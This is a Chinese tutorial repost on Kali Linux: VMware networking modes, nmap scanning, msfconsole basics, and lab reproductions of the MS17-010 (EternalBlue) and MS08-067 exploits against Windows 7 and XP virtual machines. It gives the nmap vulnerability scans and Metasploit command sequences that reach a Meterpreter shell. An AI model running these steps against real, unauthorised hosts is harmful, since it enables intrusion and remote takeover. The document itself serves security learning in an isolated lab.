Kali学习(ms17-010、ms08-067漏洞复现)

news2024/11/15 14:09:25

目录

一、kali网络设置  NAT模式、桥接上网/仅主机

VMnet0、VMnet1、VMnet8

1.NAT模式 VMnet8

(1)检查服务

(2)创建虚拟网卡

(3)创建kali的网卡信息

(4)验证

2.桥接模式 VMnet0

3.仅主机模式 VMnet1

二、nmap使用

1.端口扫描

指定端口

指定扫描方式

TCP全连接扫描

SYN半链接扫描

2.主机探测

3.服务识别

4.系统识别

三、msfconsole使用

四、 ms17-010  永恒之蓝漏洞复现

五、ms08-067漏洞复现


复现参考:
永恒之蓝漏洞复现_ms17-010 漏洞检测工具
ms08-067漏洞的复现及所遇到的问题分析

一、kali网络设置  NAT模式、桥接上网/仅主机

kali_NAT模式、桥接上网/仅主机_详细

前提了解:

VMnet0、VMnet1、VMnet8

VMware中VMnet0、VMnet1、VMnet8是什么

安装VMware workstation的时候,默认会安装3块虚拟网卡,分别是VMnet0、VMnet1、VMnet8

三种网卡的区别:
①Adapter=VMnet1=eth0(host-only)
虚拟机之间、主机与虚拟机之间互访,但虚拟机无法访问外网。
②Adapter2=VMnet8=eth8(nat)
虚拟机之间、主机与虚拟机之间互访,虚拟机可以通过主机访问外网,外网无法访问虚拟机。
③Adapter3=VMnet0=eth2(Bridged)
虚拟机相当于一台实体机,可以自由访问与被访问及上网。

1.NAT模式 VMnet8

NAT模式下的kali,子网(ip)不需要与主机处于同一网段

因为虚拟机有虚拟网卡,就像在windows系统里玩kali一样,他们的物理层公用一个设备-公用主机硬件,但在应用层上他们是相对独立的-互不干扰,可以同时使用。

NAT的作用能让多台设备共用一个外网IP进行上网。

NAT是什么,为什么能共享主机的IP?

使内网的计算机以NAT(网络地址转换)协议,通过一个公共的网关访问Internet,就像家里的路由器一样,多台设备连接上网,使用的是同一个外网IP。

(1)检查服务

键盘win+r组合键,打开运行,输入services.msc。检查以下几个服务是否正常开启。

(2)创建虚拟网卡

在网络适配器查看是否配置成功

键盘win+r打开运行,输入ncpa.cpl打开网络适配器,正常情况下,与上面配置的信息一致。

这两个信息必须是一致的

(3)创建kali的网卡信息

进入root帐号

在kali的终端输入下面代码(任意一条),用来停止网络服务

systemctl stop NetworkManager
或
service NetworkManager stop

对 /etc/network/interfaces文件 进行修改

vim /etc/network/interfaces

回车之后,打开的这个文件就是,kali的网卡。

为什么是文件?因为linux系统里,万物皆是文件形式。

按下 I键 进行修改,添加如下信息:

auto eth0
iface eth0 inet dhcp

配置完以后,按Esc键,然后再按组合键;+shift,输入wq

然后回到终端界面,输入:

systemctl restart networking
#重启网卡
(4)验证

再输入ifconfig,查看kali是否成功获取到了ip地址

验证能否与外网正常连接

2.桥接模式 VMnet0

桥接就相当于,将创建的虚拟网卡,变成交换机,与主机的网卡连接,使kali可以上网。

先选择桥接的网卡

然后在虚拟机设置里选择网络适配器为桥接

这样就可以使用了,桥接获取的ip地址,与主机处于同一网段

3.仅主机模式 VMnet1

此模式是将主机与kali加入到一个独立的局域网,kali是不能上网的。

常用于封合测试,防止病毒外泄到Intent。 

先选择仅主机的网卡

然后在虚拟机设置里选择网络适配器为仅主机

可以看到主机的ip地址与kali的ip地址,处于同于网段

结果如下:可以与主机互通,不能上网

二、nmap使用

kali的命令行中可以直接使用 nmap 命令。

打开终端,输入 nmap 后回车,可以看到 nmap 的版本,证明 nmap 可用。

1.端口扫描

扫描主机的开放端口,在nmap后面直接跟主机IP(默认扫描1000个端口)

nmap 192.168.189.1

从上图可以看到:它用25.72秒扫描了1000个端口,其中999个端口关闭,结果中列出的1个端口就是开放的端口。

指定端口

扫描指定端口,使用 -p 参数,可以一次扫描单个端口、多个端口、或扫描一个范围的端口

nmap 192.168.189.1 -p 6881

指定扫描方式

通过kali中的 wireshark 抓包分析不同扫描方式的请求信息,从而判断这些方式的区别。

打开kali中的 wireshark,选择抓包的网卡(这里是 eth0 )。

过滤条件 ip.addr == 192.168.189.1 and tcp.port == 6881

意思是:过滤IP地址是 192.168.189.1 并且 端口是 TCP的6881端口。

设置完过滤条件后,再进行命令行执行扫描命令,然后查看 wireshark 中的请求包。

TCP全连接扫描

使用 -sT 参数进行TCP全连接扫描。

全连接扫描:使用完整的三次握手建立链接,能够建立链接就判定端口开放,否则判定端口关闭。

nmap 192.168.189.1 -p 6881 -sT

如果端口开放,就会进行完整的三次握手,成功建立链接,扫描结果中,STATE字段显示为 open

如果端口关闭,就只能进行一次握手,无法建立链接,扫描结果中,STATE字段显示为closed

SYN半链接扫描

使用 -sS 参数进行SYN半链接扫描。

半链接扫描:只进行两次握手,对方返回确认帧(ACK=1)就判定端口开放(STATE字段为 open),否则判定端口关闭(STATE字段为 closed)。

nmap 192.168.189.1 -p 6881 -sS

2.主机探测

扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口。

本质上是Ping扫描,能Ping通有回包,就判定主机在线

nmap -sP 192.168.189.1

它用13.08秒扫描了这个网段的1个IP,这个主机在线

3.服务识别

扫描端口时,默认显示端口对应的服务,但不会显示服务版本

可以使用 -sV 参数,VERSION字段显示服务的详细版本

nmap 192.168.189.1 -p 6881 -sV

4.系统识别

识别 操作系统版本,可以使用 -O 参数

nmap 192.168.189.1 -p 6881 -O

5.扫描结果导出

Nmap使用教程图文教程(超详细)-CSDN博客

三、msfconsole使用

msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马。

Msfconsole是Metasploit框架的主要控制台界面,它提供了一个命令行界面来与Metasploit框架进行交互,并允许用户执行各种渗透测试任务。

Msfconsole是Metasploit的核心组件之一,它充当了一个交互式命令行和一个脚本执行器的角色。

1.打开msfconsole工具:kali终端输入 msfconsole

2.搜索漏洞: search 漏洞名字

3.选择相关模块:use 模块号

4.显示出有效的攻击载荷:show options

5.设置目标ip:set rhosts 目标ip

6.执行攻击:run 或 exploit

7.退出到msf:back

四、 ms17-010  永恒之蓝漏洞复现

准备:

  • 攻击机:kali,ip:172.16.17.230
  • 靶机:windows7,ip:172.16.17.26
  • 工具:nmap(扫描)、msfconsole

查看IP地址,将两台虚拟机设置桥接模式

尝试相互ping通

首先在攻击机上使用nmap扫一下该网段靶机的存活情况

nmap -sP 172.16.17.26

扫描靶机端口前1000的开放情况

nmap 172.16.17.26

接着使用命令扫描该主机的操作系统类型: 为win7

nmap -O 172.16.17.26

分析了相关信息后,就可以使用 nmap自带的脚本扫描该靶机上的漏洞

nmap --script=vuln 172.16.17.26

发现存在 ms17-010(永恒之蓝漏洞),使用 msfconsole

使用search命令,搜索相关漏洞

search ms17-010

使用use命令,选择相关模块

“EternalBlue SMB Remote Windows Kernel Pool Corruption” 指的是一个利用MS17-010漏洞的攻击模块。

这个模块利用了Windows操作系统中SMB服务的漏洞,允许远程执行代码,进而导致对Windows内核池的破坏。这个漏洞使得攻击者可以远程执行恶意代码,从而获取系统权限或者对系统进行破坏。

use 0   //选择一号模块,可以远程执行代码

使用命令:show options,显示出有效的攻击载荷

此处使用 set 命令,设置一下 RHOSTS (靶机的ip地址)

“rhosts”这个词在计算机安全和网络配置中通常指“远程主机”(Remote Hosts).

set RHOSTS 172.16.17.26

设置完成之后,使用 run 或者 exploit 命令执行攻击。

运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

运行成功后,就可远程命令执行。

e.g 使用ps命令,查看靶机所有进程详细信息

五、ms08-067漏洞复现

上面nmap扫过了win7没有这个漏洞

准备:

  • 攻击机:kali,ip:172.16.17.230
  • 靶机:win_xp_sp2,ip:172.16.17.164

使用命令扫描该主机的操作系统类型:

nmap -O 172.16.17.164

使用nmap自带的脚本扫描一下靶机上的漏洞

nmap --script=vuln 172.16.17.164

存在 ms08-067漏洞

打开 msfconsole,搜索ms08-067漏洞:search ms08-067

进入该漏洞模块的使用:use 0 或 use exploit/windows/smb/ms08_067_netapi

显示出有效的攻击载荷:show options

显示出可以被攻击的靶机的操作系统型号:show targets

选择简体中文靶机进行攻击:set  target  5(Windows XP SP2 英文版 (NX))

设置靶机ip:set RHOSTS 172.16.17.164

再次显示有效的攻击载荷:show options(确保靶机ip设置成功)

使用 run 或者 exploit 命令执行攻击

运行成功meterpreter >,可远程命令执行。 

遇到问题:

Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (172.16.17.164:445) timed out.

可以检查一下靶机防火墙是否关闭,我这里之前没关

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2083357.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

结果一。5.be doing表将来和 表 will的区别

be doing 表⽰近期、眼下就要发⽣的事情; will 表⽰将来的时间,则较远⼀些。如: He is going to write a letter tonight.He will write a book 。 be going to 表⽰根据主观判断将来肯定发⽣的事情。 will+ 动词原形表⽰⼀般将来时。 will ࿰

如何用Java SpringBoot+Vue打造高效产品订单管理系统?

🍊作者:计算机毕设匠心工作室 🍊简介:毕业后就一直专业从事计算机软件程序开发,至今也有8年工作经验。擅长Java、Python、微信小程序、安卓、大数据、PHP、.NET|C#、Golang等。 擅长:按照需求定制化开发项目…

【C++ Primer Plus习题】6.9

问题: 解答: #include <iostream> #include <string> #include <fstream> using namespace std;typedef struct _Donor {string name;double money; }Donor;int main() {ifstream file;string filename;int count 0;cout << "请输入文件名:&quo…

PDF合并可以如此简单?!这3种方法,简单又实用!

在日常的忙碌与学习中&#xff0c;我们时常需要将散落的PDF文件整合成一份完整的文档&#xff0c;无论是为了整理报告、汇编学习资料&#xff0c;还是为了提升阅读效率&#xff0c;PDF合并都显得尤为重要。 今天&#xff0c;就让我带你解锁三种既简单又高效的PDF合并方法&#…

进程终止 等待 替换

文章目录 一.进程的终止进程终止实在做什么&#xff1f;进程终止的3种情况自定义退出码 如何终止进程&#xff1f; 二.进程等待为什么要进行进程等待&#xff1f;进程如何等待&#xff1f;waitwaitpid 阻塞等待 && 非阻塞等待 三.进程的程序替换先看代码 && 现…

Windows电脑还在纠结用什么便签软件?

在快节奏的生活中&#xff0c;我们常常需要记录下一些重要的事情或者临时的想法&#xff0c;而便签软件就是我们的好帮手。但是&#xff0c;面对市面上众多的便签软件&#xff0c;Windows电脑用户可能会感到困惑&#xff0c;不知道该如何选择。在这里&#xff0c;小编为你提供一…

Great Wall长城工作站安装银河麒麟V10(SP1)-ARM版桌面操作系统

长城工作站安装银河麒麟V10(SP1)桌面操作系统 1. 硬件信息 [1]. Great Wall 长城台式微型计算机 产品型号&#xff1a;世恒TD120A2 型号代码&#xff1a;世恒TD120A2-019 电源&#xff1a;220V~3A 50Hz [2]. 芯片型号 架构&#xff1a; aarch64 CPU 运行模式&#xff1a…

【Qt窗口】—— 浮动窗口

目录 1.1 浮动窗口的创建 1.2 设置停靠的位置 1.3 示例小结 在Qt中&#xff0c;浮动窗口也称之为铆接部件&#xff0c;俗称为子窗口&#xff0c;浮动窗口是通过QDockWidget类来实现浮动的功能。浮动窗口⼀般是位于核⼼部件的周围&#xff0c;可以有多个。 1.1 浮动窗口的…

LeetCode 热题100-39 对称二叉树

对称二叉树 给你一个二叉树的根节点 root &#xff0c; 检查它是否轴对称。 示例 1&#xff1a; 输入&#xff1a;root [1,2,2,3,4,4,3] 输出&#xff1a;true示例 2&#xff1a; 输入&#xff1a;root [1,2,2,null,3,null,3] 输出&#xff1a;false提示&#xff1a; 树中…

【python报错已解决】AttributeError: module ‘PIL.Image‘ has no attribute ‘ANTIALIAS‘

&#x1f3ac; 鸽芷咕&#xff1a;个人主页 &#x1f525; 个人专栏: 《C干货基地》《粉丝福利》 ⛺️生活的理想&#xff0c;就是为了理想的生活! 引言 当我们使用某些Python库&#xff0c;如Pillow&#xff08;PIL的一个分支&#xff09;&#xff0c;进行图像处理时&#x…

设备共享租赁小程序系统开发制作方案

设备共享租赁小程序系统让用户方便地租赁或出租各类设备&#xff0c;包括但不限于工具、电子产品、运动器材等&#xff0c;以满足临时使用需求&#xff0c;同时为设备所有者创造额外收益。 目标用户 个人用户&#xff1a;需要临时使用工具、车辆等设备的个人。 企业用户&#…

STM32(F103ZET6)第十九课:FreeRtos的移植和使用

目录 需求一、FreeRtos简介二、移植FreeRtos1.复制代码2.内存空间分配和内核相关接口3.FreeRtosConfig4.添加到工程中三、任务块操作1.任务四种状态2.创建任务过程 需求 1.将FreeRtos&#xff08;嵌入式实时操作系统&#xff09;移植到STM32中。 2.在该系统中实现任务的创建、…

git学习教程--分支操作+远程仓库相关过程详述

目录 1.分支 1.1查看已有分支 1.2新的分支的创建 1.3改变指针的指向 1.4合并分支 2.删除分支 3.合并冲突 3.1一个简单操作 3.2手动解决冲突 4.git分支管理策略 4.1fast-forward模式 4.2no-ff模式 4.3总结 5.bug修复建议 6.强制删除 7.分布式版本控制系统 7.1远…

【递归回溯之floodfill算法专题练习】

1. 图像渲染 class Solution {int dx[4] {0, 0, -1, 1};int dy[4] {1, -1, 0, 0};int m, n;int oldcolor; public:vector<vector<int>> floodFill(vector<vector<int>>& image, int sr, int sc, int color) {oldcolor image[sr][sc]; // 保存原…

Java常用API(BigDecimal)

用于小数的精确计算 用来表示很大的小数 构造方法获取BigDecimal对象 public BigDecimal(double val) public BigDecimal(string val) 静态方法获取BigDecimal对象 public static BigDecimal value0f(double val) 1.通过传递double类型的小数来创建对象 这种方式有可能…

Linux|软件开发的基础概念|软件的源码本地编译和交叉编译概念

前言&#xff1a; 本文主要讲述软件的源码本地编译和交叉编译的基本概念&#xff0c;首先&#xff0c;是介绍什么是本地编译&#xff0c;什么是交叉编译&#xff0c;其次&#xff0c;本地编译和交叉编译到底是有什么用处&#xff0c;最后是交叉编译和本地编译的具体应用场景 …

边听边打?不再是难题,4款音频转文字神器推荐

无论是会议记录、课堂笔记还是采访录音&#xff0c;能快速准确地转录成文本&#xff0c;那可是大大提高了工作效率。市面上有几款工具在这方面做得不错&#xff0c;比如365在线转文字、布谷鸟配音、腾讯云语音识别和Speechnotes。今天就来个大比拼&#xff0c;看看它们各自的表…

人机交互的频率、时长、周期

人机交互的频率是指用户与系统互动的频繁程度&#xff1b;时长是每次互动的持续时间&#xff1b;周期是指在特定时间段内进行互动的规律或间隔。人机交互的频率、时长和周期通常与以下因素有关&#xff1a; &#xff08;1&#xff09;任务复杂性&#xff1a;复杂任务需要更多的…

docker部署clickhouse

1. 创建相关配置目录 mkdir -P /data/clickhouse/data mkdir -P /data/clickhouse/conf mkdir -P /data/clickhouse/log 2. 拉取镜像 # 下载最新版本clickhouse docker pull clickhouse/clickhouse-server # 下载指定版本clickhouse docker pull clickhouse/clickhouse…

电商数据分析:如何抓住关键指标提高销售额

在电商运营中&#xff0c;数据分析是不可或缺的一环。通过精准的数据分析&#xff0c;商家可以更好地了解市场动态、优化运营策略&#xff0c;从而提升销售业绩。然而&#xff0c;很多运营者在面对海量数据时常常无从下手。那么&#xff0c;电商运营到底该如何进行数据分析&…